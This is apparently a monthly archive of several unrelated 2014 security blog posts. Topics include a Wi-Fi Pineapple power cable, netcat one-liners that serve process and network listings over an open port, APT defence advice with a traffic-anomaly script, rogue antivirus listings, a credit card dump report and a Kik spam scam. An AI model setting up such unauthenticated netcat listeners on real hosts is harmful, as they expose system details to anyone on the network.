Monthly Archives: March 2014

USB Power Cable for the Pineapple Mark V

Preface

This quick blog post is about my weekend project from last Saturday. To start with, I bought a Pineapple Mark V from the hak5 shop. The Wi-Fi Pineapple is a special Wi-Fi access point designed for wireless network auditing, with custom, purpose-built hardware and software and the capability for extensions. You could build something like this on your own, but the Pineapple has everything pre-configured, which makes a pentester's life a lot easier.

The basic problem was that the "standard" version of the Pineapple Mark V ships with a wall plug only. When you perform a wireless or mobile pentest, you usually do not have the luxury of a wall plug, so you will either need a battery pack or feed your cute little Pineapple from your laptop.

I ordered a Pineapple Juice 6800, but the one I got is not charging, and even the replacement I got from the hakshop (big up to the hak5 guys for that one!) does not work either :( (I will try to fix at least one of them later). The USB power cable that you can buy from the hakshop is currently out of stock, but don't be sad, because it won't work with the Mark V anyway: the Mark V needs "DC in Variable 5-12V, ~1A" as input, while the output supplied by a USB host (for example a common laptop USB port) is usually around 5V at 500mA (so 0.5A).

While the voltage level will not be a problem with a USB cable (although I am not sure how well, for example, a USB flash drive would work when you power the Mark V from USB... something I have to test in the future), the current level will not be enough to power the Pineapple. Luckily, Kirchhoff's first law tells us that if we connect two wires carrying 0.5A each, then the wire leaving the junction should carry 1A, which is exactly what we need. :)

The problem is that it is not easy to find a cable with a USB Y connector on one end and a DC barrel connector on the other, so I took a USB Y cable from a USB 3.0 external HDD and a USB power cable with a DC barrel connector, and soldered them together to give enough power to my dear little Pineapple Mark V.

Parts Needed

  • A USB Y cable, that is, the one with two USB connectors at one end and whatever on the other end. External HDD cables are usually like this, to make sure the USB ports supply enough juice for the HDD.
  • A cable with a DC barrel connector (2.1mm ID / 5.5mm OD, center positive) on one end and whatever on the other end :) For example, I got this USB cable from Amazon.
  • Some heat shrink tubing to give a nice look to your final product. You can buy a nice heat shrink kit from Sparkfun, for example.

Tools needed

  • Flush/diagonal cutters (for cutting the wires)
  • Solder (for soldering, of course)
  • Soldering iron (yep, this one is also for soldering)
  • Hot air solder station (for the heat shrink tubing)
  • Third hand with Magnifying Glass (you're gonna need it, otherwise you will have to grow a third hand :) )
  • Good light (no, seriously, this is really important when you solder something!)

Assembly

As soldering wires together is not rocket science, I will basically use the pictures I took to explain what you will have to do.

So here I have my USB Y cable for a USB 3.0 external HDD:


You will have to cut the cable in half, as we need the USB Y end of it. The wires in a USB cable should be color coded; for the USB 2.0 wires these are: red = VCC, white = D-, green = D+ and black = GND. More on the USB pinouts here.


For me, as I used a USB 3.0 cable, there were two extra shielded twisted pairs:


These are the additional USB 3.0 data wires, also color coded (pinouts here and here), but we won't need them, so never mind these:


Next, my USB power cable with a DC barrel connector:


Nothing magical here; again, we only need the red and black (VCC and GND) wires, and this time the DC barrel connector end of the cable:


Before soldering, it is a good idea to test the concept and see if it works:


Looks OK. Now, to make a nice-looking cable, I used heat shrink tubing, but if you don't care about the looks, you can use insulating tape too:


One final check after the soldering but before the heat shrink tubing:


Again, looking good, so first the small heat shrink tubes for the individual wires:


And a larger heat shrink tube for the cable:


The final test. Works perfectly! (if you are wondering, the keyboard layout is Hungarian...)


Conclusion

The whole process takes about 30-40 mins and requires minimal soldering skills, so you really have no excuse not to do it yourself if you want to power your Pineapple Mark V from USB, and, as I wrote at the beginning, you don't really have any other option, as you cannot find such a cable out there.

Episode #176: Step Up to the WMIC

Tim grabs the mic:

Michael Behan writes in:

Perhaps you guys can make this one better. Haven’t put a ton of thought into it:

C:\> (echo HTTP/1.0 200 OK & wmic process list full /format:htable) | nc -l -p 3000

Then visit http://127.0.0.1:3000

This could of course be used to generate a lot more HTML reports via wmic that are quick to save from the browser. The downside is that in its current state the page can only be visited once. Adding something like /every:5 just pollutes the web page with mostly duplicate output.

Assuming you already have netcat (nc.exe) on the system, the command above will work fine, but it will only work once. After the browser receives the data, the connection has been used and the command is done. To do this multiple times you must wrap it in an infinite For loop.

C:\> for /L %i in (1, 0, 2) do (echo HTTP/1.0 200 OK & wmic process list full /format:htable) | nc -l -p 3000

This will count from 1 to 2 and count by 0, which will never happen (except for very large values of 0). We could use the wmic command to request this information from the remote machine and view it in our browser. This method will authenticate to the remote machine instead of allowing anyone to access the information.

C:\> wmic /node:joelaptop process list full /format:htable > joelaptopprocesses.html && start joelaptopprocesses.html

This will use your current credentials to authenticate to the remote machine, request the remote process in html format, save it to a file, and finally open the file in your default viewer (likely your browser). If you need to use separate credentials you can specify /user:myusername and /password:myP@assw0rd.

Hal, your turn, and I want to see this in nice HTML format. :)

Hal throws up some jazz hands:

Wow. Tim seems a little grumpy. Maybe it's because he can make a simple web server on the command line but has no way to actually request data from it via the command line. Don't worry Little Tim, maybe someday...

Heck, maybe Tim's grumpy because of the dumb way he has to code infinite loops in CMD.EXE. This is a lot easier:

$ while :; do ps -ef | nc -l 3000; done

Frankly, most browsers will interpret this as "text/plain" by default and display the output correctly.

But the above loop got me thinking that we could actually stack multiple commands in sequence:

while :; do
ps -ef | nc -l 3000
netstat -anp | nc -l 3000
df -h | nc -l 3000
...
done

Each connection will return the output of a different command until you eventually exhaust the list and start all over again with the first command.

OK, now let's deal with grumpy Tim's request for "nice HTML format". Nothing could be easier, my friends:

$ while :; do (echo '<pre>'; ps -ef; echo '</pre>') | nc -l 3000; done

Hey, it's accepted by every major browser I tested it with! And that's the way we do it downtown... (Hal drops the mic)
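As an added example (not code from the Command Line Kung Fu post), here is a small POSIX shell script that builds on Hal's `<pre>` trick: it sends a proper HTTP/1.0 status line with a Content-Type header and HTML-escapes the command output, because characters such as `<` and `&` in process command lines would otherwise be interpreted as markup by the browser. The `nc -l 3000` invocation is assumed to match the netcat used in the post.

```shell
#!/bin/sh
# Added example, not from the original post: serve command output as HTML
# over netcat, with a real HTTP header and escaped body.

# Escape the characters that matter inside an HTML <pre> block.
# '&' must be handled first so the entities we add are not re-escaped.
html_escape() {
    sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g' -e 's/"/\&quot;/g'
}

# Read body text from stdin and emit a complete HTTP/1.0 response.
# CRLF line endings in the header are what HTTP clients expect.
http_html_response() {
    body=$(printf '<pre>\n'; html_escape; printf '</pre>\n')
    printf 'HTTP/1.0 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\n\r\n%s\n' "$body"
}

# Serve one command per connection, cycling through the list like the
# loop in the post. Assumes a netcat that accepts "nc -l 3000".
serve_reports() {
    while :; do
        ps -ef      | http_html_response | nc -l 3000
        netstat -an | http_html_response | nc -l 3000
        df -h       | http_html_response | nc -l 3000
    done
}

# Constructed sample line of the kind ps -ef may print: an argument that
# contains characters which would otherwise be parsed as HTML.
sample_ps_line() {
    printf '%s\n' 'root 4242 1 0 09:00 ? 00:00:00 /usr/bin/python3 -c "print(1<2 and 3>2)" &'
}

# Only start the server when run as: sh script.sh serve
if [ "${1:-}" = "serve" ]; then
    serve_reports
fi
```

Run it with the `serve` argument and the browser shows each report rendered correctly, even when a process argument contains angle brackets.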

CIO vs CSO: Allies or Enemies


Whenever a breach occurs it reveals weaknesses in how an organization approached security.  Compromises are a great way to reveal the hidden sins organizations are committing.  In the case of the Target breach, it is a gift that keeps on giving.  While the initial breach report came out in December, it seems every week there are new “interesting” details that are revealed.  One of the more recent items is the fact that Target did not have a CSO and all security responsibilities were buried under the CIO.

The first question that people ask is whether the CIO should have been held responsible for the breach. The bottom line is that when a major event like this occurs, someone needs to be held responsible for the negligence. Therefore it is not surprising that someone was blamed for the breach. What was surprising is that security was a responsibility of the CIO. The fact that a large organization did not have a separate CSO who is a peer of the CIO is what is most concerning about the story. Clearly many things went wrong during the breach, and whoever had the responsibility for security needs to be held accountable. However, it was not fair that the executives structured the company in this manner. Running the IT infrastructure (typically a role of the CIO) and protecting the information (typically a role of the CSO) are two different roles, and it is unfair to expect one person to do both effectively. While these roles can at times be complementary, they are often at odds. Having security buried under the CIO puts that person in a conflict of interest.

First and foremost, organizations of any size, especially one the size of Target, need to have an executive who is responsible for security. With the large dependence organizations have on their digital infrastructure, security needs to have a seat at the table in the boardroom. If security gets buried under IT, whose primary responsibility is running a reliable infrastructure, bad decisions will be made and breaches will happen.

Not having a CSO today is like a football team not having a quarterback. You can have the best playbook in the world, but if you do not have someone on the field calling the plays, you are not going to win many games. In order for organizations to be successful, they must have a reliable infrastructure and proper protection of information. If an organization only has a CIO and no CSO, no one is focusing on security, and the results are pretty obvious. If there is no one focusing on security, bad things will happen. Lack of a CSO means lack of security. It is almost a guarantee that Target had an amazing security team who were screaming and yelling about all of the security issues, but there was no advocate who was listening to them and fighting their cause with the executives. From the engineers, there needs to be a communication path to the CEO, and the CSO is that channel. Without a CSO, the proper security communication does not make it to the executives. Had the executives received the proper information about security, my guess is they would have made different decisions and this story would potentially have had a happy ending.

The CIO and CSO need to be peers. IT and security need to have equal representation in the board room, making sure the executives have accurate information. Typically the CIO will report to the COO and the CSO will report to the CFO. The COO and CFO report directly to the chief executive. However an organization decides to structure it, the CIO and CSO must have different reporting lines.

In order for the CIO and CSO to have an effective working relationship, they must have clear boundaries of responsibility. Typically what works best is for the CSO to define the proper level of security, the CIO to implement the security, and the auditor to validate that the security is being done correctly. The security defined by the CSO should be based on metrics that are reported up to the executives, so they can understand the proper level of risk to accept for the organization. Metrics-based security is key to success. With metrics there are clear guidelines of what must be done and an easy way to measure compliance.

Organizations in this day and age must have a CSO. Every day that passes, with more breaches becoming public, it becomes easier to convince the executives that they need a CSO. The problem is that many CIOs do not want to have a CSO, because it is easier for them to accomplish their jobs if they control all aspects of the IT infrastructure. Therefore the CIO will not usually lobby for a CSO. There needs to be another advocate convincing the CEO. The simple question to sell the CEO is "are you comfortable with the level of security at your organization, and are you receiving the proper security metrics to make the decisions?" The problem today is that many CEOs want to create a CSO position, but the CIO convinces them they do not need one. While they have good intentions, it is often the CIO that lobbies against a CSO, since a CSO will cause them to give up control and potentially make their job more difficult. For example, when a CSO comes in they often disclose all of the security problems, which shows that security was not being properly addressed within the organization.

Defending Against the APT


Advanced Persistent Threat (APT)

Introduction
APT, formally known as the Advanced Persistent Threat, is the buzzword that everyone is using. Companies are concerned about it, the government is being compromised by it, and consultants are using it in every presentation they give. One of the main reasons organizations are broken into today is that they are fixing the wrong vulnerabilities. If you fix the threats of 3 years ago, you will lose. APT allows organizations to focus on the real threats that exist today.

While APT is important, we need to clear the smoke and hype, focusing on why it is important and what it means to you. Instead of just using it as a buzzword, if we understand the core components of APT, we can use it to improve our security. In APT, threat drives the risk calculation. Only by understanding the offensive threat will an organization be able to fix the appropriate vulnerabilities.

What is APT?
APT is the new way attackers are breaking into systems. APT is a sophisticated, mercurial way for advanced attackers to break into systems, avoid getting caught, and keep long-term access so they can exfiltrate data at will. The following are the important things to remember:

1) APT focuses on any organization, both government and non-government organizations. Some people make the mistake of thinking that the APT is only focused on Department of Defense (DoD) sites. When it comes to the Internet, the lines between government and commercial are blurring, and anything that could cause harm to a country will be targeted.

2) While the threat is advanced once it gets into a network, the entry point of many attacks is simply convincing a user to click on a link. However, once the APT breaks into a system, it is very sophisticated in what it does and how it works. Signature analysis will be ineffective in protecting against it. Advanced attacks are always changing, recompiling on the fly and utilizing encryption to avoid detection.

3) Many organizations make the mistake of thinking of attacks like the weather. There will be some stormy days and there will be some sunny days. However, on the Internet you are always in a storm. In the past, attackers would periodically attack an organization. Today attacks are nonstop. The attackers are persistent, and if an organization lets its guard down for any period of time, the chance of a compromise is very high.

4) Attackers want to take advantage of economies of scale and break into as many sites as possible, as quickly as possible. Therefore the tool of choice of an attacker is automation. Automation is not only what causes the persistent nature of the threat, but also what allows attackers to break into sites very quickly.

5) Old school attacks were about giving the victim some visible indication of a compromise. Today it is all about not getting caught. Stealth and being covert are the main goals of today's attacks. APT's goal is to look as close as possible (if not identical) to legitimate traffic. The difference is so minor that many security devices cannot differentiate between them.

6) The driver of APT is to provide some significant benefit to the attacker, the benefit being either economic or financial gain. Therefore the focus will be all about the data. Anything that has value to an organization will have value to an attacker. Since data has become so portable, and with cloud computing increasing in popularity, data is now available from the Internet via many sources.

7) Attackers do not just want to get in and leave; they want long-term access. If someone is going to spend effort breaking into a site, they will make sure they can keep that access for a long period of time. Stealing data once has value, but stealing data for 9 months gives the attacker an even bigger payoff.

Putting all of this together means that you will be constantly attacked and compromised, making it necessary for an organization to always be in battle mode. This is a never-ending battle. Since the APT is meant to be extremely stealthy, there is a good chance that an organization might be compromised and not know about it for several months. Before you discount this: if you were compromised and the attacker was not doing any visible damage, how would you know?

How to Defend Against the APT?
Prevention is ideal, but detection is a must. Most organizations focus solely on preventive measures, but the problem with the APT is that it enters a network looking just like legitimate traffic and users. Therefore, there is little to prevent. Only after the packets are in the network do they start doing harm and breaking in.

Based on the new threat vectors of the APT, the following are key things organizations can do to defend against the threat:

1) Control the user and raise awareness: the general rule is you cannot stop stupid, but you can control stupid. Many threats enter a network by tricking the user into clicking a link that they shouldn't. Limiting the actions a user is allowed to perform, combined with proper awareness sessions, can go a long way to reduce the overall exposure.

2) Perform reputation ranking on behavior: traditional security tries to classify something as either good or bad, allow or block. However, with advanced attacks this classification does not scale. Many attackers start off looking like legitimate traffic, which means they would be allowed into the network, and then once they are in they turn bad. Therefore, since the goal of attackers is to blend in, you need to track what the behavior is and rank the confidence level of whether it looks more like a legitimate user or more like evil.

3) Focus on outbound traffic: inbound traffic is often what is used to prevent and stop attackers from entering a network. While it will catch some attacks and is still important to do, with the APT it is the outbound traffic that is more damaging. If the intent is to stop exfiltration of data and information, looking at the outbound traffic is how you detect anomalous behavior, which is tied to damage to an organization.

4) Understand the changing threat: it is hard to defend against something you do not know about. Therefore, the only way to be good at defense is to understand and know how the offense operates. If organizations do not keep up with the new techniques and tactics of the attackers, they will not be able to tune their defensive measures to work correctly.

5) Manage the endpoint: while attackers might break into a network as the entry point, they ultimately want to steal information that exists on endpoints. If you want to limit the damage, controlling and locking down the endpoint will go a long way toward protecting an organization.

While the current threat is advanced, persistent, stealthy, and data focused, organizations can implement effective measures to protect their sites.

Summary
APT is only going to increase in intensity over the next year, not go away. Ignoring this problem just means there will be harm caused to your organization. The key theme of dealing with APT is "Know thy system/network." The more an organization understands about its network traffic and services, the better it can spot and identify anomalies through clipping levels, which is the better way to defend against the APT. The ultimate way to make sure an organization is properly protected is to run simulated attacks (i.e. penetration testing, red teaming, ethical hacking) and see how vulnerable the organization is and, most importantly, how quickly you detected it. The key to making this successful is to 1) always get explicit approval, 2) run benign attacks, 3) make sure the people running the test are of equal expertise to the true attacker, and 4) fix any vulnerabilities in a timely manner. The good news is that by focusing on understanding the threats and an organization's vulnerabilities, you can properly defend against the APT.
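The outbound-traffic advice in point 3) above and the Summary's "clipping levels" can be made concrete. The following Python script is an added example, not part of the original article: it derives a per-host clipping level from a baseline window of flow records (mean plus three standard deviations of the daily bytes a host sends outside the organization's address space) and reports observation days that exceed it. The flow-record layout, the internal networks, and the sample values are all assumptions constructed for the example.

```python
"""Clipping-level detector for outbound traffic (added example, not from the
article). A clipping level is the threshold below which activity counts as
normal background noise; here each internal host gets its own level from its
recent history, and days above it are reported for analyst review."""
from collections import defaultdict
from ipaddress import ip_address, ip_network
from statistics import mean, pstdev

# Address space treated as "inside"; anything else is an outbound destination.
# Assumption for the example: a real deployment uses its own allocations.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# Constructed sample flow records: day, internal source, destination, bytes sent.
# The first five days are the baseline; 2014-03-06 is the day under observation.
# 203.0.113.0/24, 198.51.100.0/24 and 192.0.2.0/24 stand in for external hosts.
SAMPLE_FLOWS = """\
2014-03-01 10.1.1.20 203.0.113.10 120000
2014-03-01 10.1.1.21 198.51.100.7 95000
2014-03-02 10.1.1.20 203.0.113.10 130000
2014-03-02 10.1.1.21 198.51.100.7 90000
2014-03-03 10.1.1.20 203.0.113.10 125000
2014-03-03 10.1.1.21 198.51.100.7 100000
2014-03-04 10.1.1.20 203.0.113.10 118000
2014-03-04 10.1.1.21 198.51.100.7 97000
2014-03-05 10.1.1.20 203.0.113.10 122000
2014-03-05 10.1.1.21 198.51.100.7 93000
2014-03-06 10.1.1.20 10.1.1.5 900000000
2014-03-06 10.1.1.20 203.0.113.10 121000
2014-03-06 10.1.1.21 192.0.2.77 4100000
"""


def parse_flows(text):
    """Parse 'day src dst bytes' lines into dicts, skipping malformed lines."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].isdigit():
            continue
        day, src, dst, nbytes = parts
        flows.append({"day": day, "src": src, "dst": dst, "bytes": int(nbytes)})
    return flows


def is_internal(addr):
    """True when the address falls inside the organization's own networks."""
    ip = ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def daily_outbound(flows):
    """Sum bytes per (host, day) for flows leaving the internal address space.
    Internal-to-internal transfers (e.g. backups) are deliberately ignored."""
    totals = defaultdict(int)
    for f in flows:
        if is_internal(f["src"]) and not is_internal(f["dst"]):
            totals[(f["src"], f["day"])] += f["bytes"]
    return dict(totals)


def clipping_levels(daily, baseline_days, k=3.0):
    """Per-host clipping level: mean + k * stdev of daily outbound bytes
    over the baseline window."""
    history = defaultdict(list)
    for (host, day), nbytes in daily.items():
        if day in baseline_days:
            history[host].append(nbytes)
    return {host: mean(v) + k * pstdev(v) for host, v in history.items() if v}


def flag_exceedances(daily, levels, observe_days):
    """Return (host, day, bytes, level) for observed days above the host's
    level. A host with no baseline at all is reported with level None, since
    a brand-new talker is itself worth a look."""
    hits = []
    for (host, day), nbytes in sorted(daily.items()):
        if day not in observe_days:
            continue
        level = levels.get(host)
        if level is None or nbytes > level:
            hits.append((host, day, nbytes, None if level is None else round(level)))
    return hits


def run_sample():
    """Run the whole pipeline over the constructed records."""
    daily = daily_outbound(parse_flows(SAMPLE_FLOWS))
    baseline = {f"2014-03-0{d}" for d in range(1, 6)}
    levels = clipping_levels(daily, baseline)
    return flag_exceedances(daily, levels, {"2014-03-06"})


if __name__ == "__main__":
    for host, day, nbytes, level in run_sample():
        print(f"{day} {host}: {nbytes} bytes outbound exceeds clipping level {level}")
```

On the sample data only 10.1.1.21 is reported: its 4.1 MB to a new external address is far above its level of roughly 105 KB, while 10.1.1.20's large internal transfer is excluded from the outbound total and its external traffic stays within its level.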

Windows AntiBreach Patrol

Windows AntiBreach Patrol is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Antivirus Patrol, Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master

To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Windows Antivirus Patrol

Windows Antivirus Patrol is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master

To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Dedicated to all the hackers – Pho3nix (Roulette Cinese)

We finally concluded the Hacker Visual Contest, through which we collected videoclips and artwork from the hacker world which we used to assemble the official videoclip for the song "Pho3nix" (Roulette Cinese) dedicated to the hacker world. I feel obliged to thank all of the participants; credits are added at the end of the clip, with a special mention to Christan Milani for the outstanding remix, to Roberto "SyS64738" Preatoni for promoting the idea throughout the hacker world, and to Gianluca Zenone aka Alex Dreiser for the videoclip realization.

Potential 7 Million Credit Card Details Leaked

UPDATE: Based on further analysis along with discussions with journalists, it appears that this credit card dump contains valid, but older card data that had been previously disclosed. To date, there is no solid evidence this represents a new breach.

The last couple of weeks have seen tensions rising between Russia and Ukraine, and along with it an increase in computer crime.

Sometime earlier this morning, a post allegedly by Anonymous Ukraine claimed to have published "more than 800 million credit cards" by releasing four archives: Visa, Mastercard, American Express, and Discover cards. Based on the initial analysis by Risk Based Security, the number appears to come to a total of 955,579 cards.

While such an attack does not appear to be directly related to the political strife between Ukraine and Russia, it does raise significant issues for card processors and consumers if the leak is legitimate.

Anonymous Ukraine has posted a short message to Pastebin that includes the following:

Today we publish the first part of our exposure of the international financial system Visa, MC, Discover & Amex, enslaved people around the world. More than 800 million credit cards. Over a trillion dollars.

Each of the four archives appears to contain valid card numbers, bank routing numbers, and full names. The dump does not contain the credit card CCV (Card Verification Value) or card expiry information. Without this information, committing fraud with the leaked data may be more difficult.

At this time, there is no indication where the data comes from or if it is from a single source or multiple. Risk Based Security and the DatalossDB project will continue to examine the data and investigate in hopes of determining more information about the breach.

Update 7:40 PM EST: In addition to the 1 million cards disclosed earlier, Anonymous Ukraine has followed up with an additional leak of over 6 million more cards, announced in a Tweet. Initial analysis of the new dump by RBS shows 6,064,823 new cards. That breaks down to 668,279 American Express, 3,255,663 Visa, 1,778,749 Mastercard, and 362,132 Discover. Counting the disclosure earlier today and the subsequent dump, the grand total now sits at 7,020,402. Upon cursory examination, a majority of cards seem to come from United States banks. Among the information released, approximately 4,000 come with full user data including social security number, credit card, card expiry, name, pins, floats, dates of birth, states, and zip codes. The new Pastebin dump from the group also suggests the data may come from ATMs or POS systems.

Spammers Abuse KiK for Survey Revenue

Recently I discovered a spam campaign that utilises the popular messaging service Kik to monetize the spammers' efforts.

As you can see, the message was sent by the unofficial Kik account (upon creating an account you automatically add the official account) and is asking you to visit an unknown website. Two warning signs that should scream at you not to visit.

So what does this campaign do? Firstly, the front page at kikgift(.)com asks for your username. This serves two purposes: it adds a sense of legitimacy to the website, and it can be used to assess how often the message gets clicked, commonly called a callback rate.

Secondly, after you enter your username, the website checks whether you are visiting on iOS or Android and shows the appropriate page asking you to download an app.

It is currently unconfirmed whether the Android ad pages lead to malware-hosting app markets.

The official Kik team has received a full report regarding this scam site.

Windows Pro Defence Kit

Windows Pro Defence Kit is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety 
